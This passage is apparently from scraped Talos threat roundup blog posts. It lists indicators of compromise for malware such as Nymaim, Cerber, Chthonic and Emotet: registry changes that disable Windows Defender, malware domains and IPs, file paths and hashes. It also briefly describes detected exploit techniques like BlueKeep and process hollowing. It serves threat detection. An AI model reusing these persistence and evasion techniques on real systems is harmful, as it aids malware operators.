\n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\fennovfx ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\wveefmwo ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\cbkklscu ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\ihqqryia ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\dcllmtdv ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 \nValue Name: Blob ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\vuddelvn ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\lkttubld ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\xwffgnxp ` | 1 \nMutexes | Occurrences \n---|--- \n`{<random GUID>}` | 4 \n`Global\\VLock` | 3 \n`Frz_State` | 1 \n`Sandboxie_SingleInstanceMutex_Control` | 1 \n`18550D22-4FCA-4AF2-9E8E-F0259D23694F` | 1 \n`b7969e9f2199` | 1 \n`<32 random hex characters>` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`103[.]248[.]137[.]133` | 28 \n`111[.]121[.]193[.]242` | 28 \n`104[.]47[.]54[.]36` | 17 \n`104[.]47[.]53[.]36` | 11 \n`40[.]113[.]200[.]201` | 7 \n`40[.]112[.]72[.]205` | 4 \n`40[.]76[.]4[.]15` | 4 \n`5[.]9[.]49[.]12` | 4 \n`144[.]76[.]133[.]38` | 4 \n`45[.]63[.]25[.]55` | 4 \n`89[.]18[.]27[.]34` | 4 \n`87[.]98[.]175[.]85` | 4 \n`104[.]215[.]148[.]63` | 3 \n`5[.]135[.]183[.]146` | 3 \n`45[.]32[.]28[.]232` | 3 \n`141[.]138[.]157[.]53` | 3 \n`45[.]63[.]99[.]180` | 3 \n`108[.]61[.]164[.]218` | 3 \n`45[.]56[.]117[.]118` | 3 \n`96[.]90[.]175[.]167` | 3 \n`104[.]238[.]186[.]189` | 3 \n`84[.]201[.]32[.]108` | 3 \n`185[.]133[.]72[.]100` | 3 \n`193[.]183[.]98[.]154` | 2 \n`23[.]94[.]5[.]133` | 2 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`microsoft-com[.]mail[.]protection[.]outlook[.]com` | 28 \n`ponedobla[.]bit` | 4 \n`myexternalip[.]com` | 1 \n`ipecho[.]net` | 1 \n`checkip[.]amazonaws[.]com` | 1 \n`nekfad[.]xyz` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\<random, matching '[a-z]{8}'>.exe` | 28 \n`%SystemRoot%\\SysWOW64\\<random, matching '[a-z]{8}'>` | 28 \n`%TEMP%\\<random, matching '[0-9]{4}'>.bat` | 28 \n`%System32%\\<random, matching '[a-z]{8}\\[a-z]{6,8}'>.exe (copy)` | 27 \n`%TEMP%\\<random, matching '[a-z]{4,9}'>.exe` | 7 \n`%APPDATA%\\By\\By.exe` | 4 \n`%APPDATA%\\winapp\\client_id` | 3 \n`%APPDATA%\\winapp\\group_tag` | 3 \n`%System32%\\Tasks\\services update` | 3 \n`%APPDATA%\\winapp` | 3 \n`%APPDATA%\\WINAPP\\<original file name>.exe` | 3 \n`%APPDATA%\\winapp\\qtmld.exe` | 1 \n`%APPDATA%\\HNC\\User\\Common\\90\\Fonts\\Fontlist\\signons.exe` | 1 \n`\\container.dat` | 1 \n`%LOCALAPPDATA%\\589ff121627b2b278b78a4a16bbdac82a879c808` | 1 \n`%LOCALAPPDATA%\\589ff121627b2b278b78a4a16bbdac82a879c808\\container.dat` | 1 \n`%SystemRoot%\\Temp\\1676.bat` | 1 \n`%SystemRoot%\\Temp\\atfjtxxz.exe` | 1 \n`%TEMP%\\updbb837023.bat` | 1 \n`%APPDATA%\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\compatibility.mik` | 1 \n`%APPDATA%\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\cookies.wic` | 1 \n`%APPDATA%\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\extensions.exe` | 1 \n`%APPDATA%\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\webappsstore.oty` | 1 \n`%APPDATA%\\MozillaMaintenanceServiceu` | 1 \n`%APPDATA%\\MozillaMaintenanceServiceu\\MozillaMaintenanceServiceu.exe` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 074af81963d44e82625056fa1772e2ab6e8b5bbfb58919c4ed4fea1e22df0a58 0d84479eb9868d33fc22a93e8f8a8555dc80c38a00197017bc86e91b3af9da9c 0f6a235a6e9a6eb292a6c5ada9043ad1efde537f19598849682f1eeb0d828e75 173100397fab511b430ba1d2f417ed19fcaadfe3d8ca8e97af6a05432fbaf3a6 2b5f5d317466ee9c4b54b6d840c0cf0e76e9633640df3a9c8f041212239839d2 2e3e02ff35a656d7edfcf29878e501492d4529f68b90b9d2bfa56314f5ffac99 37c6a10dc539555beaef7b4f73418f6721a37b2dbd1f0cecd891381b779a2d22 38ae264016466acb3d215c1451898050580e2a5bbc41cfe6dc441ce9e9dc0690 39ae2c5a2c33d0182ac83cc4440fc1ff6d5c78e3f6a861d0cc2bbc67ec16d0a4 3a303bc815ab0032c143f191f949ff833b0cc31b4349de8460bb4efd7dc1d4d8 3d085c1a1719b6520867aa16997a3aaa214efb2bac1e3ba9f4365def6cd3425e 3ecff383a31433ee6ea3b4faf9a83ed88beba6836d73cf5e45c35c4b2da88fb5 49e4a03514e44969dfd0e0e9d8c6ab90aad572461e92de573ed07f2fd289e943 5099df074e08c348f605a2171b0bd2c0fd8d118eee0d2c53f70f148aa0819e3c 519e96344029271df9b3f758a6891f8342492e43f28efa02796880e8cfaedd70 51be864bb2a297d99bf04cea956400e088ff86029c0031aa9c42f0491efcb544 530d0f977e0f3f34e4876e145677280dc662ea1d84ceb23ba34c7406582bfc71 544d256e79b29963fdeb13a39843c9c40f346d1fb977927c9ede0b37d9bea71e 5d3796595808d10fc9953dc33085e88722a75238f478471cc3723e74b1fffc7f 5fa50f66fd754d9207960ddae6764e45bfb084e9134ac5c4e7755cb9a1e92825 62386fac16d57a15f34b0874a7125f20e21442da376eb7ca1eca86f9edd8cf48 63c93baef82f65d8b47634c77eb5c250ec0546e8f86395ecad2b96a0c6e726b8 655726d8f43ae4d74631cbd1dfcf0a9649461360ee402ae574cc48a2b869a913 6d7fd6fd6ef01477b0e3b075f3d0783ce9168abded6d237f4579987d3a02f744 770dba34f27b6d21d3857e54d9fbb22694428aa1d019b5da7e93d8bedcb1b92f `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-JRpesC3qwbc/XbMXdJHjtUI/AAAAAAAAC2g/esOdAWClS5Ym6UbSd9AjI9s7TSoYjsZjACLcBGAsYHQ/s1600/2b5f5d317466ee9c4b54b6d840c0cf0e76e9633640df3a9c8f041212239839d2_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-rVEl9G_vIzU/XbMXf2YdJvI/AAAAAAAAC2k/OiLBgscS8TgKXJwdDI3xZW7C5bnHUZqCACLcBGAsYHQ/s1600/2b5f5d317466ee9c4b54b6d840c0cf0e76e9633640df3a9c8f041212239839d2_tg.png>)\n\n \n\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-k5JZcxpU5Ro/XbMXlPfL7ZI/AAAAAAAAC2o/yZfb6jFVztAgQi54MTKx5Jh8TtT54oawACLcBGAsYHQ/s1600/2f69e8d8f5ae09ffdfd1b1f2dbf001ad480deea5aeb47a6a563d98a16f5415d9_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Nymaim-7348211-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\GOCFK ` | 9 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\GOCFK \nValue Name: mbijg ` | 9 \nMutexes | Occurrences \n---|--- \n`Local\\{369514D7-C789-5986-2D19-AB81D1DD3BA1}` | 9 \n`Local\\{D0BDC0D1-57A4-C2CF-6C93-0085B58FFA2A}` | 9 \n`Local\\{F04311D2-A565-19AE-AB73-281BA7FE97B5}` | 9 \n`Local\\{306BA354-8414-ABA3-77E9-7A7F347C71F4}` | 9 \n`Local\\{F58B5142-BC49-9662-B172-EA3D10CAA47A}` | 9 \n`Local\\{C170B740-57D9-9B0B-7A4E-7D6ABFCDE15D}` | 9 \n`Local\\{74966FCB-4057-0A33-C72F-DA1761B8A937}` | 9 \n`Local\\{457A7A9B-5537-F010-1620-E1BCC38A93D1}` | 9 \n`Local\\{<random GUID>}` | 9 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`64[.]71[.]188[.]178` | 13 \n`66[.]220[.]23[.]114` | 8 \n`184[.]105[.]76[.]250` | 5 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`qjgtlozoh[.]com` | 14 \n`ezgouisk[.]pw` | 9 \n`ryron[.]com` | 1 \n`onubkqstb[.]com` | 1 \n`jeajlfdtoua[.]in` | 1 \n`ysxmebrfyg[.]net` | 1 \n`oxfab[.]pw` | 1 \n`bwapyvznpflh[.]pw` | 1 \n`voszetuy[.]in` | 1 \n`klspisvji[.]in` | 1 \n`ofiracujrsdy[.]net` | 1 \n`istpmxnf[.]net` | 1 \n`sianowq[.]pw` | 1 \n`gpkoz[.]pw` | 1 \n`sdghuwtwxsm[.]com` | 1 \n`uslrspq[.]pw` | 1 \n`kwchhgmla[.]in` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\fro.dfx` | 19 \n`\\Documents and Settings\\All Users\\pxs\\pil.ohu` | 19 \n`%ProgramData%\\ph` | 9 \n`%ProgramData%\\ph\\fktiipx.ftf` | 9 \n`%TEMP%\\gocf.ksv` | 9 \n`%ProgramData%\\<random, matching '[a-z0-9]{3,7}'>` | 9 \n`%APPDATA%\\<random, matching '[a-z0-9]{3,7}'>` | 9 \n`%LOCALAPPDATA%\\<random, matching '[a-z0-9]{3,7}'>` | 9 \n`%TEMP%\\bpnb.skg` | 1 \n`%TEMP%\\mlo.aqz` | 1 \n`\\Documents and Settings\\All Users\\ju\\xcio.cxj` | 1 \n \n#### File Hashes\n\n` 3ef2abee25c7ba9f153048e3c400f2935e3e40f988e79b55d12843a90b85a2c1 5816c31cfc9208418279e80e661be48705b54eef97612e2a3acb6b43e1520707 6743826da7e312a954d21cffa0e795599c64ac484ab913da0516d9a8c27c7d8f 74eba0187ce6b3abbc20e1ab98c0732fbf79f680b65ecd7c45eafd81370d0e5e 8dcf86bd3796d59fa421e8b2c442355a72c8a58eb489bc268063c8823bc880ba 97950901d1a3cb6713d8e59e21b4312e3ebc98f0e67071590b0b0514a67cdf1e 98e61798ed2d611ddb45b515bb45fbdd8b45ca5820f50297b4a3152e20d6768b a6bedf7f7e6fa95b3181e466468ec1812227396d18b51e027ffd670fc4699d4d a97dc1afeec16c38f5d92e1096930bfa61a60a8c4ccd3f378f5eb6f27ac5a58d ae65aa4775949b46281b12ffccd29da2aa2ba9463b7a26b17d9170153da8ab85 aee701fe3b36b6441a17ae591f6272764dfaf1361d688ca353813e022b90b545 b8d7cf0c79024e1cd6564731df735059705896d635951019b21d3719a69e64e6 bfa4b25db8ca23842ea3c6d977668c6110b0ca23919b395864065f09e8f15638 c3791696930b1226ccc03537ee50cdf275069b39524b808e3857ae9e85d6ca15 c8f6c7ff30e91b7236802bffaa759ada33ad7963bd3401912d3df9c108205a10 d1c761853ebdfd063cbe19d1a6f5ca1823bef0f6c527064846e20f1c8df8c54e d913691cdc1b1140905af020364afbc3144989b7a7947332efb29ef95440597d de8ff7107c7566fa9d68c49f0808c2c47df83fabeaa99b70a2f30da9f6d4c1a1 deee1f14fe06f8ceac4f617cba37d027664b9bc171cf0f1a3fca9c78da4df525 e5210cb809f2f6c04d51994491cf29edcaadc338df7294051406e5dd6b0d2d8e eb5ac18bb9bbce53b7522955ee36eccc8d21c5347c54b3830c5085cb323b6838 f9f839ec0ee45b5bc8b2dc65ed2747c662de954d7b14d8d00cb1fc47878f513a fe76a31b8ac35d140fb815504c739f952bc9f1625f5d936e837af21e5f1c1b3b `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-cga40gFxnJE/XbMXy6OCXXI/AAAAAAAAC2w/zrc9qRiZE8crzaw2RQaKiCatrumDLC63gCLcBGAsYHQ/s1600/3ef2abee25c7ba9f153048e3c400f2935e3e40f988e79b55d12843a90b85a2c1_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-mLutp8aaYd4/XbMX4-OUsWI/AAAAAAAAC20/qVuiRUpiUfsEbNjGQUsrDjZo_TzAvSMCACLcBGAsYHQ/s1600/fe76a31b8ac35d140fb815504c739f952bc9f1625f5d936e837af21e5f1c1b3b_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Cerber-7343756-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER ` | 28 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER \nValue Name: PendingFileRenameOperations ` | 25 \nMutexes | Occurrences \n---|--- \n`shell.{<random GUID>}` | 26 \n`shell.{381828AA-8B28-3374-1B67-35680555C5EF}` | 25 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`178[.]33[.]158[.]0/27` | 26 \n`178[.]33[.]159[.]0/27` | 26 \n`178[.]33[.]160[.]0/25` | 26 \n`178[.]128[.]255[.]179` | 17 \n`150[.]109[.]231[.]116` | 15 \n`54[.]164[.]0[.]55` | 13 \n`34[.]206[.]50[.]228` | 12 \n`104[.]24[.]111[.]135` | 11 \n`104[.]24[.]110[.]135` | 6 \n`216[.]218[.]206[.]69` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`api[.]blockcypher[.]com` | 25 \n`bitaps[.]com` | 17 \n`chain[.]so` | 17 \n`btc[.]blockr[.]io` | 17 \n`bc-prod-web-lb-430045627[.]us-east-1[.]elb[.]amazonaws[.]com` | 9 \n`hjhqmbxyinislkkt[.]1j9r76[.]top` | 5 \nFiles and or directories created | Occurrences \n---|--- \n`<dir>\\_R_E_A_D___T_H_I_S___<random, matching '[A-F0-9]{4,8}'>_.txt` | 28 \n`<dir>\\_R_E_A_D___T_H_I_S___<random, matching '[A-F0-9]{4,8}'>_.hta` | 28 \n`\\I386\\COMPDATA\\EPSON3.TXT` | 26 \n`%TEMP%\\8f793a96\\4751.tmp` | 26 \n`%TEMP%\\8f793a96\\da80.tmp` | 26 \n`\\I386\\COMPDATA\\BOSERROR.TXT` | 26 \n`\\I386\\RUNW32.BAT` | 26 \n`%TEMP%\\tmp1.bmp` | 26 \n`<dir>\\<random, matching [A-Z0-9\\-]{10}.[A-F0-9]{4}> (copy)` | 26 \n`%TEMP%\\d19ab989\\4710.tmp` | 25 \n`%TEMP%\\d19ab989\\a35f.tmp` | 25 \n`%TEMP%\\tmp<random, matching [A-F0-9]{1,4}>.tmp` | 25 \n`%TEMP%\\tmp<random, matching [A-F0-9]{1,4}>.bmp` | 25 \n \n#### File Hashes\n\n` 0571ddf62e8bcf0dfc91f61079145ef5a334ade39ffd45d7ce88b4cbe42a15d3 09606b24a726b8179417a36c9aca18f44ebcf98f2240fbb398b70c49090d050b 162012945f91033f3683b742d660795cc2e184f41d6db3a15703e38024ce7985 1974b3f6d08447d18279bce6cd737aec3438cbda3cc90d8fd625fdc9e06339eb 1f86d067251a326322db9afea633b6ef9419eb456eded355220fe590ea2f11c5 283bd9ce2b81146780f060c00fdb7e11701cb617a55b5b6e15217b8041fb5480 2b75044e81ecbee8f6da594a277e37d7a232e934ef9de81b8185e4c0213564a6 2dbf7bed5adcba2ce1f48736431a2041ec2c6a581a6edc4c0883f6394022316c 34012082527c5206f58fe4dc7ed65aa785864ffc57b69ef36a2684a0bd77df93 37ae3f37a90f62a3247ac2b2afaa2a7b7feca603fd9258a23be3b0c06fad3baf 394e282ad6f08c49e67258afb5be535d98ca35b2bffdfd4cc6f866ff909da21c 41dfd05edf2657153e9f265e5f41877660b0fe9b3d4c46d82a0560234fe7d911 54be4270379a47819af99f6b455af363531d0c035f6f645b0505240cbe2e18df 58a71b81fb151fc64383e7adad9aadab56188c8e5107fe157889b598d80331b9 5cde373946029302a628504ae7fe6c26037ba6c6e7cf575aa33258808dc7b4d3 5e3b677a238a772109ab8282964d0a7dc4a68e422471589eeb58dacf4f3b1917 5f5c89d4cae98e32d764146b5ea87879ed6c355171535e1ca1b65f8a5d2fc296 69747e554bef6e4fec803333c19df48b7317848feb58842849fdb3797d41f66c 6d1ed5c4c21f2f9fa42d1cede8411ae9347ae85c03a76dd212856187c66328b3 797adc29fe0dddbfb03aec9344dd2f93a702bb57920f35bd7decb92873b2ea86 79acc4d7034c595c35d2280281699064e114bc6ca7dcc461c2077a2d350f78c4 821923194cc976d5b0785d114769c85b473e7e7316f0bfab3e60f94404bd9a91 8232399d1c7350132d3347c6aeffcea06c38e6c8fbf3527399a51d7fc3bff1bb 831872753224405c5553a509d3ac4af91032d789cba67977e43e1b0b68abe543 91f928319c927531fb3c2863eefd2fff358a962887d8fd8deeeead74d3602562 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-asipuCkmusQ/XbMYIJ0AudI/AAAAAAAAC3A/hZAqgmyXDF8CK4RONMldSt1xzAoKJqOuACLcBGAsYHQ/s1600/1974b3f6d08447d18279bce6cd737aec3438cbda3cc90d8fd625fdc9e06339eb_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-nhBt9C3hzsU/XbMYO4h6WNI/AAAAAAAAC3I/ougbZS8J9D4tq1A9zZ8njBjlwbCnR3CPQCLcBGAsYHQ/s1600/58a71b81fb151fc64383e7adad9aadab56188c8e5107fe157889b598d80331b9_tg.png>)\n\n \n\n\n#### Malware\n\n[](<https://1.bp.blogspot.com/-djWpLHBjSCk/XbMYVgGnNnI/AAAAAAAAC3M/Wyc-yHP_HOU_X12Y3Aubqupp6jChnKNcACLcBGAsYHQ/s1600/1974b3f6d08447d18279bce6cd737aec3438cbda3cc90d8fd625fdc9e06339eb_malware.png>)\n\n \n\n\n \n\n\n* * *\n\n## Exploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nCVE-2019-0708 detected \\- (69038) \n--- \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP request). Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nMadshi injection detected \\- (2294) \nMadshi is a code injection framework that uses process injection to start a new thread if other methods to start a thread within a process fail. This framework is used by a number of security solutions. It is also possible for malware to use this technique. \nProcess hollowing detected \\- (321) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead. \nExcessively long PowerShell command detected \\- (304) \nA PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats. \nDealply adware detected \\- (226) \nDealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware. \nKovter injection detected \\- (183) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nGamarue malware detected \\- (156) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. \nInstallcore adware detected \\- (88) \nInstall core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware. \nPowerShell file-less infection detected \\- (49) \nA PowerShell command was stored in an environment variable and run. The environment variable is commonly set by a previously run script and is used as a means of evasion. This behavior is a known tactic of the Kovter and Poweliks malware families. \nReverse tcp payload detected \\- (38) \nAn exploit payload intended to connect back to an attacker controlled host using tcp has been detected. \n \n", "modified": "2019-10-25T09:33:00", "published": "2019-10-25T09:33:00", "id": "TALOSBLOG:DC2E9A485DD55B49C0CC8932C0026F33", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/nTLDbUoTJvY/threat-roundup-1018-1025.html", "type": "talosblog", "title": "Threat Roundup for October 18 to October 25", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-17T23:27:07", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0708"], "description": "[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Jan. 10 and Jan. 17. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/blogs/1/2020/01/tru.json_.txt>)that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness. \nThe most prevalent threats highlighted in this roundup are: \n \nThreat Name | Type | Description \n---|---|--- \nWin.Trojan.Chthonic-7516291-1 | Trojan | Chthonic is a banking trojan derived from the Zeus family of banking malware. It is typically spread via phishing emails and attempts to steal sensitive information from an infected machine. Chthonic has also been observed downloading follow-on malware such as Azorult, another information stealer. \nWin.Dropper.Upatre-7524255-0 | Dropper | Upatre is a malicious downloader often used by exploit kits and phishing campaigns. Upatre downloads and executes malicious executables, such as banking malware. \nWin.Malware.TrickBot-7524669-1 | Malware | Trickbot is a banking trojan targeting sensitive information for certain financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts. \nDoc.Dropper.Emotet-7540598-0 | Dropper | Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails. Talos recently discovered an uptick in Emotet distribution. For more, click [here](<https://blog.talosintelligence.com/2020/01/stolen-emails-reflect-emotets-organic.html>). \nWin.Packed.njRAT-7532636-1 | Packed | njRAT, also known as Bladabindi, is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes and remotely turn on the victim's webcam and microphone. njRAT was developed by the Sparclyheason group. Some of the largest attacks using this malware date back to 2014. \nWin.Malware.Cerber-7533438-1 | Malware | Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension \".cerber,\" although in more recent campaigns other file extensions are used. \nWin.Packed.Barys-7532466-0 | Packed | This is a trojan and downloader that allows malicious actors to upload files to a victim's computer. \nWin.Packed.Razy-7532659-0 | Packed | Razy is oftentimes a generic detection name for a Windows trojan. It collects sensitive information from the infected host and encrypt the data, and send it to a command and control (C2) server. Information collected might include screenshots. The samples modify auto-execute functionality by setting and creating a value in the registry for persistence. \nWin.Packed.Dridex-7532883-1 | Packed | Dridex is a well-known banking trojan that aims to steal credentials and other sensitive information from an infected machine. \n \n* * *\n\n## Threat Breakdown\n\n### Win.Trojan.Chthonic-7516291-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: Hidden ` | 11 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM \nValue Name: EnableLUA ` | 11 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: Start ` | 11 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND \nValue Name: Start ` | 11 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: ShowSuperHidden ` | 11 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS \nValue Name: Start ` | 11 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: Start ` | 11 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WUAUSERV \nValue Name: Start ` | 11 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 2827271685 ` | 11 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: TaskbarNoNotification ` | 11 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: TaskbarNoNotification ` | 11 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: HideSCAHealth ` | 11 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: HideSCAHealth ` | 11 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN ` | 11 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: 2827271685 ` | 11 \nMutexes | Occurrences \n---|--- \n`Frz_State` | 11 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`40[.]91[.]124[.]111` | 11 \n`208[.]100[.]26[.]245` | 11 \n`40[.]67[.]189[.]14` | 5 \n`20[.]45[.]1[.]107` | 5 \n`40[.]90[.]247[.]210` | 2 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`www[.]update[.]microsoft[.]com[.]nsatc[.]net` | 11 \n`trokelnopartunofroner[.]com` | 11 \n`mplusworldofficeupdates[.]com` | 11 \n`imaginyourselfuafe[.]com` | 11 \n`ltdcommprovvetverify[.]com` | 11 \n \n#### File Hashes\n\n` 085b7d3df5bdf13484ad58dc9b34431a98117f0d267ac3aba91cfc0b384ea35f 